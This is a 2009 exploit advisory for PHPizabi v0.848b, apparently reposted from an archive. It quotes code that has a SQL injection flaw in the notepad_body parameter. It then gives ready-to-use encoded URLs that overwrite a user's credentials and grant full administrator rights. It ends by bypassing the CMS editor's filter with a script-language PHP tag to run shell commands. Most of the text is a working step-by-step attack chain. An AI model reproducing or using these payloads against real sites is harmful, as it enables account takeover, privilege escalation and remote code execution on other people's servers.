phpizabi-escalate.txt
Posted on 25 March 2009
-------------------------------------------------------------------------------- PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation (php.ini independent) by Nine:Situations:Group::bookoo -------------------------------------------------------------------------------- our site: http://retrogod.altervista.org/ software site: http://www.phpizabi.net/ -------------------------------------------------------------------------------- vulnerability: sql injection in /theme/default/proc.inc.php <?php function bufferProcParse($buffer) { global $CONF; $tpl = new template; $tpl -> LoadThis($buffer); // HANDLE POSTED NOTEPAD DATA /////////////////////////////////////////////////////// if (isset($_GET["notepad_body"])) { myQ("UPDATE `[x]users` SET `notepad_body` = '".urldecode($_GET["notepad_body"])."' WHERE `id`='".me("id")."'"); me("flush"); } .. note urldecode() ... exploitation, manual: injection urls: change username and password of an existing user: [sql]', username = 'bookoo', password = md5('pass') WHERE username = 'user'/* which becomes: http://host/path_to_phpizabi/?notepad_body=%2527,%20username%20=%20%2527bookoo%2527,%20password%20=%20md5(%2527pass%2527)%20WHERE%20username%20=%20%2527user% 2527/* grant yourself admin rights: [sql]', is_moderator = 1, is_administrator = 1, is_superadministrator = 1 WHERE username = 'bookoo'/* which becomes: http://host/path_to_phpizabi/?notepad_body=%2527,%20is_moderator%20=%201,%20is_administrator%20=%201,%20is_superadministrator%20=%201%20WHERE%20username%20=% 20%2527bookoo%2527/* navigate: http://host/path_to_phpizabi/?L=admin.index boom ! now go to: http://host/path_to_phpizabi/?L=admin.cms.edit&id={cms.file} use this opening and closing tag style, example: <script language="php"> system("ls -la"); </script> (it is always availiable, see:http://www.php.net/manual/en/language.basic-syntax.phpmode.php) because of that preg_replace() in /modules/admin/cms/edit.php : .. if (isset($_POST["Submit"])) { if ($handle = fopen("modules/cms/{$_GET["id"]}.php", "w")) { $body = "<?php if (!defined("CORE_STRAP")) die(); ?> " .preg_replace('#(<\?.*\?>)|(<%.*%>)|<\?php|<\?|\?>|<%|%>#si', NULL, stripslashes($_POST["body"][0])) ." <!-- Edited by ".me("username")." on ".date($CONF["LOCALE_HEADER_DATE_TIME"])." -->"; ; fwrite($handle, $body); fclose($handle); .. which is bypassed. save changes and navigate: http://host/path_to_phpizabi/?L=cms._cms_file_ to see the output... now visit log page: http://192.168.0.1/phpizabi/?L=admin.logs.logs .. -------------------------------------------------------------------------------- original url: http://retrogod.altervista.org/9sg_phpizabi_848bc1.html
